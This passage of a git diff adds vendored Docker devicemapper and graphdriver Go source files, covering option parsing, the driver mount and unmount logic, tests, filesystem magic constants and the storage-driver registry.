+func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps []idtools.IDMap) (*DeviceSet, error) { + devicemapper.SetDevDir("/dev") + + devices := &DeviceSet{ + root: root, + metaData: metaData{Devices: make(map[string]*devInfo)}, + dataLoopbackSize: defaultDataLoopbackSize, + metaDataLoopbackSize: defaultMetaDataLoopbackSize, + baseFsSize: defaultBaseFsSize, + overrideUdevSyncCheck: defaultUdevSyncOverride, + doBlkDiscard: true, + thinpBlockSize: defaultThinpBlockSize, + deviceIDMap: make([]byte, deviceIDMapSz), + deletionWorkerTicker: time.NewTicker(time.Second * 30), + uidMaps: uidMaps, + gidMaps: gidMaps, + minFreeSpacePercent: defaultMinFreeSpacePercent, + } + + foundBlkDiscard := false + for _, option := range options { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return nil, err + } + key = strings.ToLower(key) + switch key { + case "dm.basesize": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + userBaseSize = true + devices.baseFsSize = uint64(size) + case "dm.loopdatasize": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + devices.dataLoopbackSize = size + case "dm.loopmetadatasize": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + devices.metaDataLoopbackSize = size + case "dm.fs": + if val != "ext4" && val != "xfs" { + return nil, fmt.Errorf("devmapper: Unsupported filesystem %s\n", val) + } + devices.filesystem = val + case "dm.mkfsarg": + devices.mkfsArgs = append(devices.mkfsArgs, val) + case "dm.mountopt": + devices.mountOptions = joinMountOptions(devices.mountOptions, val) + case "dm.metadatadev": + devices.metadataDevice = val + case "dm.datadev": + devices.dataDevice = val + case "dm.thinpooldev": + devices.thinPoolDevice = strings.TrimPrefix(val, "/dev/mapper/") + case "dm.blkdiscard": + foundBlkDiscard = true + devices.doBlkDiscard, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + case 
"dm.blocksize": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + // convert to 512b sectors + devices.thinpBlockSize = uint32(size) >> 9 + case "dm.override_udev_sync_check": + devices.overrideUdevSyncCheck, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + + case "dm.use_deferred_removal": + enableDeferredRemoval, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + + case "dm.use_deferred_deletion": + enableDeferredDeletion, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + + case "dm.min_free_space": + if !strings.HasSuffix(val, "%") { + return nil, fmt.Errorf("devmapper: Option dm.min_free_space requires %% suffix") + } + + valstring := strings.TrimSuffix(val, "%") + minFreeSpacePercent, err := strconv.ParseUint(valstring, 10, 32) + if err != nil { + return nil, err + } + + if minFreeSpacePercent >= 100 { + return nil, fmt.Errorf("devmapper: Invalid value %v for option dm.min_free_space", val) + } + + devices.minFreeSpacePercent = uint32(minFreeSpacePercent) + case "dm.xfs_nospace_max_retries": + _, err := strconv.ParseUint(val, 10, 64) + if err != nil { + return nil, err + } + devices.xfsNospaceRetries = val + default: + return nil, fmt.Errorf("devmapper: Unknown option %s\n", key) + } + } + + // By default, don't do blk discard hack on raw devices, its rarely useful and is expensive + if !foundBlkDiscard && (devices.dataDevice != "" || devices.thinPoolDevice != "") { + devices.doBlkDiscard = false + } + + if err := devices.initDevmapper(doInit); err != nil { + return nil, err + } + + return devices, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go new file mode 100644 index 0000000000..9ab3e4f864 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go @@ -0,0 +1,106 @@ +package devmapper + +// 
Definition of struct dm_task and sub structures (from lvm2) +// +// struct dm_ioctl { +// /* +// * The version number is made up of three parts: +// * major - no backward or forward compatibility, +// * minor - only backwards compatible, +// * patch - both backwards and forwards compatible. +// * +// * All clients of the ioctl interface should fill in the +// * version number of the interface that they were +// * compiled with. +// * +// * All recognized ioctl commands (ie. those that don't +// * return -ENOTTY) fill out this field, even if the +// * command failed. +// */ +// uint32_t version[3]; /* in/out */ +// uint32_t data_size; /* total size of data passed in +// * including this struct */ + +// uint32_t data_start; /* offset to start of data +// * relative to start of this struct */ + +// uint32_t target_count; /* in/out */ +// int32_t open_count; /* out */ +// uint32_t flags; /* in/out */ + +// /* +// * event_nr holds either the event number (input and output) or the +// * udev cookie value (input only). +// * The DM_DEV_WAIT ioctl takes an event number as input. +// * The DM_SUSPEND, DM_DEV_REMOVE and DM_DEV_RENAME ioctls +// * use the field as a cookie to return in the DM_COOKIE +// * variable with the uevents they issue. +// * For output, the ioctls return the event number, not the cookie. 
+// */ +// uint32_t event_nr; /* in/out */ +// uint32_t padding; + +// uint64_t dev; /* in/out */ + +// char name[DM_NAME_LEN]; /* device name */ +// char uuid[DM_UUID_LEN]; /* unique identifier for +// * the block device */ +// char data[7]; /* padding or data */ +// }; + +// struct target { +// uint64_t start; +// uint64_t length; +// char *type; +// char *params; + +// struct target *next; +// }; + +// typedef enum { +// DM_ADD_NODE_ON_RESUME, /* add /dev/mapper node with dmsetup resume */ +// DM_ADD_NODE_ON_CREATE /* add /dev/mapper node with dmsetup create */ +// } dm_add_node_t; + +// struct dm_task { +// int type; +// char *dev_name; +// char *mangled_dev_name; + +// struct target *head, *tail; + +// int read_only; +// uint32_t event_nr; +// int major; +// int minor; +// int allow_default_major_fallback; +// uid_t uid; +// gid_t gid; +// mode_t mode; +// uint32_t read_ahead; +// uint32_t read_ahead_flags; +// union { +// struct dm_ioctl *v4; +// } dmi; +// char *newname; +// char *message; +// char *geometry; +// uint64_t sector; +// int no_flush; +// int no_open_count; +// int skip_lockfs; +// int query_inactive_table; +// int suppress_identical_reload; +// dm_add_node_t add_node; +// uint64_t existing_table_size; +// int cookie_set; +// int new_uuid; +// int secure_data; +// int retry_remove; +// int enable_checks; +// int expected_errno; + +// char *uuid; +// char *mangled_uuid; +// }; +// diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go new file mode 100644 index 0000000000..5c2abcefcb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go @@ -0,0 +1,110 @@ +// +build linux + +package devmapper + +import ( + "fmt" + "testing" + "time" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/graphtest" +) + +func init() { + // Reduce the size the the 
base fs and loopback for the tests + defaultDataLoopbackSize = 300 * 1024 * 1024 + defaultMetaDataLoopbackSize = 200 * 1024 * 1024 + defaultBaseFsSize = 300 * 1024 * 1024 + defaultUdevSyncOverride = true + if err := graphtest.InitLoopbacks(); err != nil { + panic(err) + } +} + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestDevmapperSetup and TestDevmapperTeardown +func TestDevmapperSetup(t *testing.T) { + graphtest.GetDriver(t, "devicemapper") +} + +func TestDevmapperCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "devicemapper") +} + +func TestDevmapperCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "devicemapper") +} + +func TestDevmapperCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "devicemapper") +} + +func TestDevmapperTeardown(t *testing.T) { + graphtest.PutDriver(t) +} + +func TestDevmapperReduceLoopBackSize(t *testing.T) { + tenMB := int64(10 * 1024 * 1024) + testChangeLoopBackSize(t, -tenMB, defaultDataLoopbackSize, defaultMetaDataLoopbackSize) +} + +func TestDevmapperIncreaseLoopBackSize(t *testing.T) { + tenMB := int64(10 * 1024 * 1024) + testChangeLoopBackSize(t, tenMB, defaultDataLoopbackSize+tenMB, defaultMetaDataLoopbackSize+tenMB) +} + +func testChangeLoopBackSize(t *testing.T, delta, expectDataSize, expectMetaDataSize int64) { + driver := graphtest.GetDriver(t, "devicemapper").(*graphtest.Driver).Driver.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) + defer graphtest.PutDriver(t) + // make sure data or metadata loopback size are the default size + if s := driver.DeviceSet.Status(); s.Data.Total != uint64(defaultDataLoopbackSize) || s.Metadata.Total != uint64(defaultMetaDataLoopbackSize) { + t.Fatalf("data or metadata loop back size is incorrect") + } + if err := driver.Cleanup(); err != nil { + t.Fatal(err) + } + //Reload + d, err := Init(driver.home, []string{ + fmt.Sprintf("dm.loopdatasize=%d", 
defaultDataLoopbackSize+delta), + fmt.Sprintf("dm.loopmetadatasize=%d", defaultMetaDataLoopbackSize+delta), + }, nil, nil) + if err != nil { + t.Fatalf("error creating devicemapper driver: %v", err) + } + driver = d.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) + if s := driver.DeviceSet.Status(); s.Data.Total != uint64(expectDataSize) || s.Metadata.Total != uint64(expectMetaDataSize) { + t.Fatalf("data or metadata loop back size is incorrect") + } + if err := driver.Cleanup(); err != nil { + t.Fatal(err) + } +} + +// Make sure devices.Lock() has been release upon return from cleanupDeletedDevices() function +func TestDevmapperLockReleasedDeviceDeletion(t *testing.T) { + driver := graphtest.GetDriver(t, "devicemapper").(*graphtest.Driver).Driver.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver) + defer graphtest.PutDriver(t) + + // Call cleanupDeletedDevices() and after the call take and release + // DeviceSet Lock. If lock has not been released, this will hang. + driver.DeviceSet.cleanupDeletedDevices() + + doneChan := make(chan bool) + + go func() { + driver.DeviceSet.Lock() + defer driver.DeviceSet.Unlock() + doneChan <- true + }() + + select { + case <-time.After(time.Second * 5): + // Timer expired. That means lock was not released upon + // function return and we are deadlocked. Release lock + // here so that cleanup could succeed and fail the test. 
+ driver.DeviceSet.Unlock() + t.Fatalf("Could not acquire devices lock after call to cleanupDeletedDevices()") + case <-doneChan: + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go new file mode 100644 index 0000000000..7cf422ce6a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go @@ -0,0 +1,231 @@ +// +build linux + +package devmapper + +import ( + "fmt" + "io/ioutil" + "os" + "path" + "strconv" + + "github.com/Sirupsen/logrus" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/devicemapper" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/go-units" +) + +func init() { + graphdriver.Register("devicemapper", Init) +} + +// Driver contains the device set mounted and the home directory +type Driver struct { + *DeviceSet + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter +} + +// Init creates a driver with the given home and the set of options. +func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + deviceSet, err := NewDeviceSet(home, true, options, uidMaps, gidMaps) + if err != nil { + return nil, err + } + + if err := mount.MakePrivate(home); err != nil { + return nil, err + } + + d := &Driver{ + DeviceSet: deviceSet, + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + ctr: graphdriver.NewRefCounter(graphdriver.NewDefaultChecker()), + } + + return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil +} + +func (d *Driver) String() string { + return "devicemapper" +} + +// Status returns the status about the driver in a printable format. +// Information returned contains Pool Name, Data File, Metadata file, disk usage by +// the data and metadata, etc. 
+func (d *Driver) Status() [][2]string { + s := d.DeviceSet.Status() + + status := [][2]string{ + {"Pool Name", s.PoolName}, + {"Pool Blocksize", fmt.Sprintf("%s", units.HumanSize(float64(s.SectorSize)))}, + {"Base Device Size", fmt.Sprintf("%s", units.HumanSize(float64(s.BaseDeviceSize)))}, + {"Backing Filesystem", s.BaseDeviceFS}, + {"Data file", s.DataFile}, + {"Metadata file", s.MetadataFile}, + {"Data Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Used)))}, + {"Data Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Total)))}, + {"Data Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Available)))}, + {"Metadata Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Used)))}, + {"Metadata Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Total)))}, + {"Metadata Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Available)))}, + {"Thin Pool Minimum Free Space", fmt.Sprintf("%s", units.HumanSize(float64(s.MinFreeSpace)))}, + {"Udev Sync Supported", fmt.Sprintf("%v", s.UdevSyncSupported)}, + {"Deferred Removal Enabled", fmt.Sprintf("%v", s.DeferredRemoveEnabled)}, + {"Deferred Deletion Enabled", fmt.Sprintf("%v", s.DeferredDeleteEnabled)}, + {"Deferred Deleted Device Count", fmt.Sprintf("%v", s.DeferredDeletedDeviceCount)}, + } + if len(s.DataLoopback) > 0 { + status = append(status, [2]string{"Data loop file", s.DataLoopback}) + } + if len(s.MetadataLoopback) > 0 { + status = append(status, [2]string{"Metadata loop file", s.MetadataLoopback}) + } + if vStr, err := devicemapper.GetLibraryVersion(); err == nil { + status = append(status, [2]string{"Library Version", vStr}) + } + return status +} + +// GetMetadata returns a map of information about the device. 
+func (d *Driver) GetMetadata(id string) (map[string]string, error) { + m, err := d.DeviceSet.exportDeviceMetadata(id) + + if err != nil { + return nil, err + } + + metadata := make(map[string]string) + metadata["DeviceId"] = strconv.Itoa(m.deviceID) + metadata["DeviceSize"] = strconv.FormatUint(m.deviceSize, 10) + metadata["DeviceName"] = m.deviceName + return metadata, nil +} + +// Cleanup unmounts a device. +func (d *Driver) Cleanup() error { + err := d.DeviceSet.Shutdown(d.home) + + if err2 := mount.Unmount(d.home); err == nil { + err = err2 + } + + return err +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create adds a device with a given id and the parent. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + var storageOpt map[string]string + if opts != nil { + storageOpt = opts.StorageOpt + } + + if err := d.DeviceSet.AddDevice(id, parent, storageOpt); err != nil { + return err + } + + return nil +} + +// Remove removes a device with a given id, unmounts the filesystem. 
+func (d *Driver) Remove(id string) error { + if !d.DeviceSet.HasDevice(id) { + // Consider removing a non-existing device a no-op + // This is useful to be able to progress on container removal + // if the underlying device has gone away due to earlier errors + return nil + } + + // This assumes the device has been properly Get/Put:ed and thus is unmounted + if err := d.DeviceSet.DeleteDevice(id, false); err != nil { + return err + } + + mp := path.Join(d.home, "mnt", id) + if err := os.RemoveAll(mp); err != nil && !os.IsNotExist(err) { + return err + } + + return nil +} + +// Get mounts a device with given id into the root filesystem +func (d *Driver) Get(id, mountLabel string) (string, error) { + mp := path.Join(d.home, "mnt", id) + rootFs := path.Join(mp, "rootfs") + if count := d.ctr.Increment(mp); count > 1 { + return rootFs, nil + } + + uid, gid, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + d.ctr.Decrement(mp) + return "", err + } + + // Create the target directories if they don't exist + if err := idtools.MkdirAllAs(path.Join(d.home, "mnt"), 0755, uid, gid); err != nil && !os.IsExist(err) { + d.ctr.Decrement(mp) + return "", err + } + if err := idtools.MkdirAs(mp, 0755, uid, gid); err != nil && !os.IsExist(err) { + d.ctr.Decrement(mp) + return "", err + } + + // Mount the device + if err := d.DeviceSet.MountDevice(id, mp, mountLabel); err != nil { + d.ctr.Decrement(mp) + return "", err + } + + if err := idtools.MkdirAllAs(rootFs, 0755, uid, gid); err != nil && !os.IsExist(err) { + d.ctr.Decrement(mp) + d.DeviceSet.UnmountDevice(id, mp) + return "", err + } + + idFile := path.Join(mp, "id") + if _, err := os.Stat(idFile); err != nil && os.IsNotExist(err) { + // Create an "id" file with the container/image id in it to help reconstruct this in case + // of later problems + if err := ioutil.WriteFile(idFile, []byte(id), 0600); err != nil { + d.ctr.Decrement(mp) + d.DeviceSet.UnmountDevice(id, mp) + return "", err + } + } + + return 
rootFs, nil +} + +// Put unmounts a device and removes it. +func (d *Driver) Put(id string) error { + mp := path.Join(d.home, "mnt", id) + if count := d.ctr.Decrement(mp); count > 0 { + return nil + } + err := d.DeviceSet.UnmountDevice(id, mp) + if err != nil { + logrus.Errorf("devmapper: Error unmounting device %s: %s", id, err) + } + return err +} + +// Exists checks to see if the device exists. +func (d *Driver) Exists(id string) bool { + return d.DeviceSet.HasDevice(id) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go new file mode 100644 index 0000000000..cca1fe1b38 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go @@ -0,0 +1,89 @@ +// +build linux + +package devmapper + +import ( + "bytes" + "fmt" + "os" + "path/filepath" + "syscall" +) + +// FIXME: this is copy-pasted from the aufs driver. +// It should be moved into the core. + +// Mounted returns true if a mount point exists. +func Mounted(mountpoint string) (bool, error) { + mntpoint, err := os.Stat(mountpoint) + if err != nil { + if os.IsNotExist(err) { + return false, nil + } + return false, err + } + parent, err := os.Stat(filepath.Join(mountpoint, "..")) + if err != nil { + return false, err + } + mntpointSt := mntpoint.Sys().(*syscall.Stat_t) + parentSt := parent.Sys().(*syscall.Stat_t) + return mntpointSt.Dev != parentSt.Dev, nil +} + +type probeData struct { + fsName string + magic string + offset uint64 +} + +// ProbeFsType returns the filesystem name for the given device id. 
+func ProbeFsType(device string) (string, error) { + probes := []probeData{ + {"btrfs", "_BHRfS_M", 0x10040}, + {"ext4", "\123\357", 0x438}, + {"xfs", "XFSB", 0}, + } + + maxLen := uint64(0) + for _, p := range probes { + l := p.offset + uint64(len(p.magic)) + if l > maxLen { + maxLen = l + } + } + + file, err := os.Open(device) + if err != nil { + return "", err + } + defer file.Close() + + buffer := make([]byte, maxLen) + l, err := file.Read(buffer) + if err != nil { + return "", err + } + + if uint64(l) != maxLen { + return "", fmt.Errorf("devmapper: unable to detect filesystem type of %s, short read", device) + } + + for _, p := range probes { + if bytes.Equal([]byte(p.magic), buffer[p.offset:p.offset+uint64(len(p.magic))]) { + return p.fsName, nil + } + } + + return "", fmt.Errorf("devmapper: Unknown filesystem type on %s", device) +} + +func joinMountOptions(a, b string) string { + if a == "" { + return b + } + if b == "" { + return a + } + return a + "," + b +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go new file mode 100644 index 0000000000..f0bce562b7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go @@ -0,0 +1,270 @@ +package graphdriver + +import ( + "errors" + "fmt" + "io" + "os" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/vbatts/tar-split/tar/storage" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" +) + +// FsMagic unsigned id of the filesystem in use. +type FsMagic uint32 + +const ( + // FsMagicUnsupported is a predefined constant value other than a valid filesystem id. + FsMagicUnsupported = FsMagic(0x00000000) +) + +var ( + // All registered drivers + drivers map[string]InitFunc + + // ErrNotSupported returned when driver is not supported. 
+ ErrNotSupported = errors.New("driver not supported") + // ErrPrerequisites retuned when driver does not meet prerequisites. + ErrPrerequisites = errors.New("prerequisites for driver not satisfied (wrong filesystem?)") + // ErrIncompatibleFS returned when file system is not supported. + ErrIncompatibleFS = fmt.Errorf("backing file system is unsupported for this graph driver") +) + +//CreateOpts contains optional arguments for Create() and CreateReadWrite() +// methods. +type CreateOpts struct { + MountLabel string + StorageOpt map[string]string +} + +// InitFunc initializes the storage driver. +type InitFunc func(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (Driver, error) + +// ProtoDriver defines the basic capabilities of a driver. +// This interface exists solely to be a minimum set of methods +// for client code which choose not to implement the entire Driver +// interface and use the NaiveDiffDriver wrapper constructor. +// +// Use of ProtoDriver directly by client code is not recommended. +type ProtoDriver interface { + // String returns a string representation of this driver. + String() string + // CreateReadWrite creates a new, empty filesystem layer that is ready + // to be used as the storage for a container. Additional options can + // be passed in opts. parent may be "" and opts may be nil. + CreateReadWrite(id, parent string, opts *CreateOpts) error + // Create creates a new, empty, filesystem layer with the + // specified id and parent and options passed in opts. Parent + // may be "" and opts may be nil. + Create(id, parent string, opts *CreateOpts) error + // Remove attempts to remove the filesystem layer with this id. + Remove(id string) error + // Get returns the mountpoint for the layered filesystem referred + // to by this id. You can optionally specify a mountLabel or "". + // Returns the absolute path to the mounted layered filesystem. 
+ Get(id, mountLabel string) (dir string, err error) + // Put releases the system resources for the specified id, + // e.g, unmounting layered filesystem. + Put(id string) error + // Exists returns whether a filesystem layer with the specified + // ID exists on this driver. + Exists(id string) bool + // Status returns a set of key-value pairs which give low + // level diagnostic status about this driver. + Status() [][2]string + // Returns a set of key-value pairs which give low level information + // about the image/container driver is managing. + GetMetadata(id string) (map[string]string, error) + // Cleanup performs necessary tasks to release resources + // held by the driver, e.g., unmounting all layered filesystems + // known to this driver. + Cleanup() error +} + +// DiffDriver is the interface to use to implement graph diffs +type DiffDriver interface { + // Diff produces an archive of the changes between the specified + // layer and its parent layer which may be "". + Diff(id, parent string) (io.ReadCloser, error) + // Changes produces a list of changes between the specified layer + // and its parent layer. If parent is "", then all changes will be ADD changes. + Changes(id, parent string) ([]archive.Change, error) + // ApplyDiff extracts the changeset from the given diff into the + // layer with the specified id and parent, returning the size of the + // new layer in bytes. + // The archive.Reader must be an uncompressed stream. + ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) + // DiffSize calculates the changes between the specified id + // and its parent and returns the size in bytes of the changes + // relative to its base filesystem directory. + DiffSize(id, parent string) (size int64, err error) +} + +// Driver is the interface for layered/snapshot file system drivers. 
+type Driver interface { + ProtoDriver + DiffDriver +} + +// DiffGetterDriver is the interface for layered file system drivers that +// provide a specialized function for getting file contents for tar-split. +type DiffGetterDriver interface { + Driver + // DiffGetter returns an interface to efficiently retrieve the contents + // of files in a layer. + DiffGetter(id string) (FileGetCloser, error) +} + +// FileGetCloser extends the storage.FileGetter interface with a Close method +// for cleaning up. +type FileGetCloser interface { + storage.FileGetter + // Close cleans up any resources associated with the FileGetCloser. + Close() error +} + +// Checker makes checks on specified filesystems. +type Checker interface { + // IsMounted returns true if the provided path is mounted for the specific checker + IsMounted(path string) bool +} + +func init() { + drivers = make(map[string]InitFunc) +} + +// Register registers an InitFunc for the driver. +func Register(name string, initFunc InitFunc) error { + if _, exists := drivers[name]; exists { + return fmt.Errorf("Name already registered %s", name) + } + drivers[name] = initFunc + + return nil +} + +// GetDriver initializes and returns the registered driver +func GetDriver(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) { + if initFunc, exists := drivers[name]; exists { + return initFunc(filepath.Join(config.Root, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) + } + + pluginDriver, err := lookupPlugin(name, pg, config) + if err == nil { + return pluginDriver, nil + } + logrus.WithError(err).WithField("driver", name).WithField("home-dir", config.Root).Error("Failed to GetDriver graph") + return nil, ErrNotSupported +} + +// getBuiltinDriver initializes and returns the registered driver, but does not try to load from plugins +func getBuiltinDriver(name, home string, options []string, uidMaps, gidMaps []idtools.IDMap) (Driver, error) { + if initFunc, exists := drivers[name]; exists { + 
return initFunc(filepath.Join(home, name), options, uidMaps, gidMaps) + } + logrus.Errorf("Failed to built-in GetDriver graph %s %s", name, home) + return nil, ErrNotSupported +} + +// Options is used to initialize a graphdriver +type Options struct { + Root string + DriverOptions []string + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + ExperimentalEnabled bool +} + +// New creates the driver and initializes it at the specified root. +func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) { + if name != "" { + logrus.Debugf("[graphdriver] trying provided driver: %s", name) // so the logs show specified driver + return GetDriver(name, pg, config) + } + + // Guess for prior driver + driversMap := scanPriorDrivers(config.Root) + for _, name := range priority { + if name == "vfs" { + // don't use vfs even if there is state present. + continue + } + if _, prior := driversMap[name]; prior { + // of the state found from prior drivers, check in order of our priority + // which we would prefer + driver, err := getBuiltinDriver(name, config.Root, config.DriverOptions, config.UIDMaps, config.GIDMaps) + if err != nil { + // unlike below, we will return error here, because there is prior + // state, and now it is no longer supported/prereq/compatible, so + // something changed and needs attention. Otherwise the daemon's + // images would just "disappear". 
+ logrus.Errorf("[graphdriver] prior storage driver %s failed: %s", name, err) + return nil, err + } + + // abort starting when there are other prior configured drivers + // to ensure the user explicitly selects the driver to load + if len(driversMap)-1 > 0 { + var driversSlice []string + for name := range driversMap { + driversSlice = append(driversSlice, name) + } + + return nil, fmt.Errorf("%s contains several valid graphdrivers: %s; Please cleanup or explicitly choose storage driver (-s )", config.Root, strings.Join(driversSlice, ", ")) + } + + logrus.Infof("[graphdriver] using prior storage driver: %s", name) + return driver, nil + } + } + + // Check for priority drivers first + for _, name := range priority { + driver, err := getBuiltinDriver(name, config.Root, config.DriverOptions, config.UIDMaps, config.GIDMaps) + if err != nil { + if isDriverNotSupported(err) { + continue + } + return nil, err + } + return driver, nil + } + + // Check all registered drivers if no priority driver is found + for name, initFunc := range drivers { + driver, err := initFunc(filepath.Join(config.Root, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) + if err != nil { + if isDriverNotSupported(err) { + continue + } + return nil, err + } + return driver, nil + } + return nil, fmt.Errorf("No supported storage backend found") +} + +// isDriverNotSupported returns true if the error initializing +// the graph driver is a non-supported error. 
+func isDriverNotSupported(err error) bool { + return err == ErrNotSupported || err == ErrPrerequisites || err == ErrIncompatibleFS +} + +// scanPriorDrivers returns an un-ordered scan of directories of prior storage drivers +func scanPriorDrivers(root string) map[string]bool { + driversMap := make(map[string]bool) + + for driver := range drivers { + p := filepath.Join(root, driver) + if _, err := os.Stat(p); err == nil && driver != "vfs" { + driversMap[driver] = true + } + } + return driversMap +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go new file mode 100644 index 0000000000..2891a84f3a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go @@ -0,0 +1,19 @@ +package graphdriver + +import "syscall" + +var ( + // Slice of drivers that should be used in an order + priority = []string{ + "zfs", + } +) + +// Mounted checks if the given path is mounted as the fs type +func Mounted(fsType FsMagic, mountPath string) (bool, error) { + var buf syscall.Statfs_t + if err := syscall.Statfs(mountPath, &buf); err != nil { + return false, err + } + return FsMagic(buf.Type) == fsType, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go new file mode 100644 index 0000000000..5c8d0e2301 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go @@ -0,0 +1,135 @@ +// +build linux + +package graphdriver + +import ( + "path/filepath" + "syscall" + + "github.com/docker/docker/pkg/mount" +) + +const ( + // FsMagicAufs filesystem id for Aufs + FsMagicAufs = FsMagic(0x61756673) + // FsMagicBtrfs filesystem id for Btrfs + FsMagicBtrfs = FsMagic(0x9123683E) + // FsMagicCramfs filesystem id for Cramfs + FsMagicCramfs = FsMagic(0x28cd3d45) + // FsMagicEcryptfs filesystem id for eCryptfs + FsMagicEcryptfs = 
FsMagic(0xf15f) + // FsMagicExtfs filesystem id for Extfs + FsMagicExtfs = FsMagic(0x0000EF53) + // FsMagicF2fs filesystem id for F2fs + FsMagicF2fs = FsMagic(0xF2F52010) + // FsMagicGPFS filesystem id for GPFS + FsMagicGPFS = FsMagic(0x47504653) + // FsMagicJffs2Fs filesystem if for Jffs2Fs + FsMagicJffs2Fs = FsMagic(0x000072b6) + // FsMagicJfs filesystem id for Jfs + FsMagicJfs = FsMagic(0x3153464a) + // FsMagicNfsFs filesystem id for NfsFs + FsMagicNfsFs = FsMagic(0x00006969) + // FsMagicRAMFs filesystem id for RamFs + FsMagicRAMFs = FsMagic(0x858458f6) + // FsMagicReiserFs filesystem id for ReiserFs + FsMagicReiserFs = FsMagic(0x52654973) + // FsMagicSmbFs filesystem id for SmbFs + FsMagicSmbFs = FsMagic(0x0000517B) + // FsMagicSquashFs filesystem id for SquashFs + FsMagicSquashFs = FsMagic(0x73717368) + // FsMagicTmpFs filesystem id for TmpFs + FsMagicTmpFs = FsMagic(0x01021994) + // FsMagicVxFS filesystem id for VxFs + FsMagicVxFS = FsMagic(0xa501fcf5) + // FsMagicXfs filesystem id for Xfs + FsMagicXfs = FsMagic(0x58465342) + // FsMagicZfs filesystem id for Zfs + FsMagicZfs = FsMagic(0x2fc12fc1) + // FsMagicOverlay filesystem id for overlay + FsMagicOverlay = FsMagic(0x794C7630) +) + +var ( + // Slice of drivers that should be used in an order + priority = []string{ + "aufs", + "btrfs", + "zfs", + "overlay2", + "overlay", + "devicemapper", + "vfs", + } + + // FsNames maps filesystem id to name of the filesystem. 
